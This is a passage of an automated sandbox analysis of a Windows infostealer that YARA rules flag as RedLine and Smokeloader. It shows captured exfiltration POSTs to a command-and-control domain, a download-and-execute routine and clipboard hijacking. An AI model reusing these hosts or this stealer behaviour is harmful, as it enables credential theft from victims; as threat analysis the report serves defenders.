2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 47 50 38 50 57 68 64 70 48 4e 75 45 72 78 4c 2b 41 75 52 70 6d 6f 37 7a 67 4d 69 58 7a 2b 33 50 4e 38 31 38 75 64 5a 72 6e 56 55 32 30 56 39 78 41 47 64 53 74 35 7a 73 42 34 41 71 6b 79 44 4f 30 50 47 30 69 39 6d 4d 36 6f 4a 6c 78 7a 72 69 67 45 58 49 62 42 6a 2f 44 31 6f 58 61 52 7a 47 6a 71 59 49 31 54 2f 44 66 36 4f 67 6e 4c 54 4d 6b 63 2f 76 70 45 32 58 44 66 65 56 52 6f 46 56 5a 70 78 64 52 55 63 79 48 74 71 52 70 51 37 44 66 76 5a 43 33 36 2b 6e 70 63 75 50 79 2b 33 50 4e 39 6c 38 75 64 5a 4c 6e 56 55 32 30 56 46 61 48 57 30 65 36 4d 32 37 58 74 5a 38 69 79 76 54 33 71 50 6d 6b 38 47 4c 6f 34 78 32 31 6a 4c 69 68 46 53 4a 55 54 44 52 57 6d 4d 35 52 56 58 32 6b 36 38 50 7a 54 6a 46 52 71 4f 35 74 36 50 4d 76 2f 4b 61 6b 48 44 46 66 73 65 56 55 49 77 Data Ascii: GP8PWhdpHNuErxL+AuRpmo7zgMiXz+3PN818udZrnVU20V9xAGdSt5zsB4AqkyDO0PG0i9mM6oJlxzrigEXIbBj/D1oXaRzGjqYI1T/Df6OgnLTMkc/vpE2XDfeVRoFVZpxdRUcyHtqRpQ7DfvZC36+npcuPy+3PN9l8udZLnVU20VFaHW0e6M27XtZ8iyvT3qPmk8GLo4x21jLihFSJUTDRWmM5RVX2k68PzTjFRqO5t6PMv/KakHDFfseVUIw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.24.223	443	7460	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:10:01 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DILV8F4FV6WQ1ZE2I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18152 Host: rapeflowwj.lat
2024-12-18 20:10:01 UTC	15331	OUT	Data Raw: 2d 2d 44 49 4c 56 38 46 34 46 56 36 57 51 31 5a 45 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 30 37 30 32 38 38 42 43 33 32 45 32 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 49 4c 56 38 46 34 46 56 36 57 51 31 5a 45 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 49 4c 56 38 46 34 46 56 36 57 51 31 5a 45 32 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 44 49 4c 56 Data Ascii: --DILV8F4FV6WQ1ZE2IContent-Disposition: form-data; name="hwid"99070288BC32E24AAC8923850305D13E--DILV8F4FV6WQ1ZE2IContent-Disposition: form-data; name="pid"2--DILV8F4FV6WQ1ZE2IContent-Disposition: form-data; name="lid"4h5VfH----DILV
2024-12-18 20:10:01 UTC	2821	OUT	Data Raw: 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc Data Ascii: h/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q
2024-12-18 20:10:02 UTC	1051	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:10:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d07d8bvr5u9ommf3sjme30c1k4; expires=Sun, 13-Apr-2025 13:56:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xim%2B%2BCpdZUebxF92tFcinvS318%2FQNOzgI7%2FGnSqBbwm5Zt0PpkIjfCmtHXnAZ%2Fq3tU7sLzGkSweq5yuThArIge3f%2FpVLl7%2F4EtsbL1xqbKrkWyQOgp%2B8LodbfDCYNBdwpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cb402df74332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2094&min_rtt=2089&rtt_var=794&sent=14&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19111&delivery_rate=1368963&cwnd=118&unsent_bytes=0&cid=a17f7e8410cd3218&ts=1149&x=0"
2024-12-18 20:10:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 20:10:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.24.223	443	7460	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:10:03 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PEOS2F1337 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8731 Host: rapeflowwj.lat
2024-12-18 20:10:03 UTC	8731	OUT	Data Raw: 2d 2d 50 45 4f 53 32 46 31 33 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 30 37 30 32 38 38 42 43 33 32 45 32 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 45 4f 53 32 46 31 33 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 45 4f 53 32 46 31 33 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 50 45 4f 53 32 46 31 33 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --PEOS2F1337Content-Disposition: form-data; name="hwid"99070288BC32E24AAC8923850305D13E--PEOS2F1337Content-Disposition: form-data; name="pid"2--PEOS2F1337Content-Disposition: form-data; name="lid"4h5VfH----PEOS2F1337Content-Dispo
2024-12-18 20:10:04 UTC	1036	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1nuukn1v1h9db8k8pqtu50hil2; expires=Sun, 13-Apr-2025 13:56:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDnUxorg3StlLO2gcu0MJpdXyxCQncQMBTzc8jILhz39UyhXPHA4j9CfCrXS9pG6m9Bo%2F95u6i0hZQfv8LtCu1xVoFEkd29oKZ50uh22v92hGXT3gDSS2qtDEvUv14DoPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cb4f0ab242e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1806&rtt_var=799&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9660&delivery_rate=1616832&cwnd=241&unsent_bytes=0&cid=0fa03099dd4d76a2&ts=1081&x=0"
2024-12-18 20:10:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 20:10:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	104.21.24.223	443	7460	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:10:06 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HVMU99Q4EDBVT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: rapeflowwj.lat
2024-12-18 20:10:06 UTC	15331	OUT	Data Raw: 2d 2d 48 56 4d 55 39 39 51 34 45 44 42 56 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 30 37 30 32 38 38 42 43 33 32 45 32 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 56 4d 55 39 39 51 34 45 44 42 56 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 56 4d 55 39 39 51 34 45 44 42 56 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 48 56 4d 55 39 39 51 34 45 44 42 56 54 0d 0a 43 Data Ascii: --HVMU99Q4EDBVTContent-Disposition: form-data; name="hwid"99070288BC32E24AAC8923850305D13E--HVMU99Q4EDBVTContent-Disposition: form-data; name="pid"3--HVMU99Q4EDBVTContent-Disposition: form-data; name="lid"4h5VfH----HVMU99Q4EDBVTC
2024-12-18 20:10:06 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-18 20:10:08 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9gr0u2rlrt51f5mgffqk1drtc8; expires=Sun, 13-Apr-2025 13:56:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kN3vt5IrVgjm1swRMYVD8wNpmjUK6sr1BiXIkHLn6xu2ryqQhvctAr4by5TNyc5GtPkzPwozsQjiGboZDI%2B2NlM5JUSYy0f4ChnopRueWpMXM2%2FxFRLewnD0Z%2BKcyp0U2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cb5fab42330c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1867&min_rtt=1861&rtt_var=702&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21357&delivery_rate=1569048&cwnd=190&unsent_bytes=0&cid=444b8a62b57830a0&ts=2212&x=0"
2024-12-18 20:10:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 20:10:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:09:44
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\TUp6f2knn2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TUp6f2knn2.exe"
Imagebase:	0x400000
File size:	435'712 bytes
MD5 hash:	A4F21B597FB56B09132987C396B7ACC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	15:09:52
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe"
Imagebase:	0x400000
File size:	368'128 bytes
MD5 hash:	9026F04B1266851659FB62C91BD7F2F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:10:07
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1800
Imagebase:	0x250000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.8%
Total number of Nodes:	736
Total number of Limit Nodes:	21

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
<, xrefs: 00402B45
ShareScreen, xrefs: 00402A12

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 00B4B42E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B4B456
Module32First.KERNEL32(00000000,00000224), ref: 00B4B476

Memory Dump Source

Source File: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b4a000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 571694e608212539f98729cec5ba627ba1d530ccdbecf287560aaa91c4544b60
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: ABF0F6311007107FD7203BF8988DF6E72E8EF48325F100668E742915C1CB74EE055A61

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0253003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0253024D

Strings

cess, xrefs: 0253018D
kernel32.dll, xrefs: 0253008F, 02530095

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: cf20da78aaaed986420dfc0625246ce6185aa6519c43f0d07238763fa49f06d1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 47526875A01229DFDB65CF58C984BACBBB1BF09314F1480D9E94DAB391DB30AA85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
ShareScreen, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

